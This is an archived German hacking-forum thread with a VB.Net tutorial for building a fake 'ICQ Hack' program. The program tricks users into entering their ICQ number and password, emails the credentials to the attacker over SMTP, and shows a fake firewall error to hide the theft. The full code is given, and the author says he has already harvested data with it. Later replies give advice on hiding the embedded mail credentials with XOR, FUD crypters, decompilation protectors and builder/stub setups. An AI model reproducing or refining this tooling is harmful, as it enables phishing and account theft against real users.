PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [VB.Net][Text-Tut]Einfaches Phishing Tool



Kohlensäure
12.03.2010, 18:24
Hallo Free-Hack,
heute möchte ich euch zeigen wie ihr ein einfaches Phishing Tool erstellt.

Was ihr braucht ?
-Ein Gehirn
-Ein Compiler
-Grundkenntnisse in VB.Net

So nun fangen wir an.

Ihr erstellt euch erstmal eine neue Windows Applikation und nennt diese z.B. "ICQ Hack".
Dann fügt ihr 2 Labels ein und 2 Textboxe, 1 Button. Ihr benennt diese erstmal um in
:
-Label1 = ICQ Nummer
-Label2 = ICQ Passwort
-Button1 = Verbinden

Nun stellt ihr diese so in das Formular wie euch es passt ;) Vielleicht fügt ich noch paar nette Bildchen ein damit das Tool "echter" wirkt.

Nun gehen wir zum Coding Teil !
Als erstes ändert ihr bei der Textbox die zum Password gehört die Eigenschaften, einfach Textbox markieren und dann "Password Char" suchen und dort "*" einfügen (ohne "). Nun geht ihr auf den Button und geht ins Coding Fenster. Erstmal sollte es so aussehen :

Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
End ClassNun geht ihr zu Public Class Form1 und schreibt dadrüber folgendes herein :


Imports System.Net.Mail
Imports System.NetUnd nun zum Button, dort schreibt ihr dies wie folgt


Dim text As String
text = "ICQ ID: " & TextBox1.Text & "ICQ Password: " & TextBox2.Text
Nun damit leitet ihr sozu ein das die EMail die Daten bekommt die in die Textbox1 und 2 eingetragen werden, Textbox1 ist die ICQ Nummer, Textbox2 das ICQ Passwort. Nun fügen mir eine kleine Fehler Meldung rein damit die Person denkt das dass Tool KEIN Fake ist.


If TextBox1.Text = "" Then
MsgBox("Bitte geben sie ihren ICQ Nummer ein.", MsgBoxStyle.Critical)
End If
If TextBox2.Text = "" Then
MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
End If
Nun sollte alles bis jetzt so aussehen


Imports System.Net.Mail
Imports System.Net
Public Class Form
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim text As String
text = "ICQ ID: " & TextBoxID.Text & "ICQ Password: " & TextBoxPass.Text
If TextBox1.Text = "" Then
MsgBox("Bitte geben sie ihren Flyff ID ein.", MsgBoxStyle.Critical)
End If
If TextBox2.Text = "" Then
MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
End If
End Class
Nun kommt das eigentliche worauf wir hinaus wollen ihr fügt nun folgendes beim Button1 Code hinein:


Dim eMail As New Net.Mail.SmtpClient("smtp.web.de")
eMail.Credentials = New NetworkCredential("DEINEEMAIL@web.de", "DEINPW")
eMail.Send("DEINEEMAIL@web.de", "DEINEEMAIL@web.de", "Betreff", text)
MsgBox("Ihre Firewall blockiert das Programm", MsgBoxStyle.Critical)
Nun müsst ihr das editieren und eure Email dort einfügen, bei DEINEEMAIL und dein Passwort von dem Email Account, es geht eigentlich nur mit Web.de oder Gmx, falls ihr Gmx wählt solltet ihr noch den SMTP Server ändern. Nun sieht alles so aus !


Imports System.Net.Mail
Imports System.Net
Public Class Form
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim text As String
text = "ICQ ID: " & TextBoxID.Text & "ICQ Password: " & TextBoxPass.Text
If TextBox1.Text = "" Then
MsgBox("Bitte geben sie ihren Flyff ID ein.", MsgBoxStyle.Critical)
End If
If TextBox2.Text = "" Then
MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
End If
Dim eMail As New Net.Mail.SmtpClient("smtp.web.de")
eMail.Credentials = New NetworkCredential("DEINEEMAIL@web.de", "DEINPW")
eMail.Send("DEINEEMAIL@web.de", "DEINEEMAIL@web.de", "Betreff", text)
MsgBox("Ihre Firewall blockiert das Programm", MsgBoxStyle.Critical)
End Sub
End Class


Ich hoffe es hat euch ein bisschen geholfen, ich konnte das leider nicht so gut erklären ich hoffe ihr versteht es wenigstens auch so ;)
Wenn ihr Fehler entdeckt, dann bitte ich euch dies zu Posten, denn aus Fehlern lernt man, und ich bin bereit zu lernen :D

:p

BlackCobra
12.03.2010, 18:58
Gibts da nicht noch SMTP-exeptions?

Kohlensäure
12.03.2010, 22:00
Also ich habe es so gemacht und habe damit einige Daten schon gesammelt ;)
Das einzige Problem ist das man das Programm crypten muss da man sonst im Hex die Email adresse und das Passwort sieht :D

BlackCobra
12.03.2010, 22:34
Oder du XOR'st das pw und lässt es zur laufzeit in eine Variable decrypten.

Kohlensäure
13.03.2010, 14:12
Sorry aber soweit bin ich glaub ich nicht bzw. habe mich NOCH nicht damit beschäftigt, sollte ich die nächste Zeit mal tuhen :D

p.s. Danke für den Hinweis !

Thunderstorm
13.03.2010, 14:30
Mhh nettes kleines TUT ^^
Könnte man ja auch mal mit FTP Upload machen
Aber weres es nicht eig besser wenn man die beiden TXT boxen in 2 string speichert ??

Chazer2010
08.04.2010, 15:19
Ich bin noch relativ neu im Gebiet des Hackens etc... habe allerdings schon ein wenig Programmiererfahrung im .NET Framework. Es reicht also mit einem FUD Crypter das Programm zu crypten, damit man nicht in den Quelcode und somit auch nicht die eMail Adresse einsehen kann?

Die Möglichkeit mit der varibalen Speicherung des Passworts hört sich ebenfalls interessant an.

krusty
08.04.2010, 15:25
ich denke nal, werd strings unverschlüselt in .net programmen stehen lässt ist selber schuld.
Man sollte das ganze Programm dann noch mit einem Protector von decompilierung schützen, denn dann hilft die verschlüsselung auch nichts mehr.

Chazer2010
08.04.2010, 16:02
Also verschlüsseln und nen Protector dahinter... Ist das verschlüsseln überhaupt notwendig, wenn der Quelcode nicht dekompiliert werden kann ? Sind die Mailadresse und das Passwort etwa im Hex oder Dergleichen einsehbar? Weil dann wäre die Lösung hier ausm TUT ja eher weniger gut.

Planxty
08.04.2010, 16:06
vb.net ist meines wissens eins der am leichtesten zu decompilenden sprachen ^^ und ja es sind auch stirings auch im plain, wenn man sie nicht verschlüsselt

Chazer2010
08.04.2010, 16:13
Sorry für die vllt etwas blöde Frage, aber was ist ein Plain?

Planxty
08.04.2010, 16:17
naja, die strings können einfach ohne großen aufwand ausgelesen werden ;) das wollte ich damit sagen ;)

Chazer2010
08.04.2010, 16:29
Ok, was wäre denn dann eine optimale oder zufriedenstellende Lösung für vb.net Anwendungen? Also den String im Programm verschlüssen und auch verschlüsselt zur email/FTP senden?, sowie einen Protector um den Quelcode "un"-dekompilierbar zu machen?

Slawa
10.04.2010, 11:32
Hey, danke dass du mal wieder einen Beispielcode gemacht hast, ist wahrscheinlich für die vb.net Anfänger sehr hilfreich, jetzt könntest du das auch mit einem builder alles kombinieren und eine stub verwenden, so könntest du dein phishing tool optimal aufbereiten.

Gruß

Slawa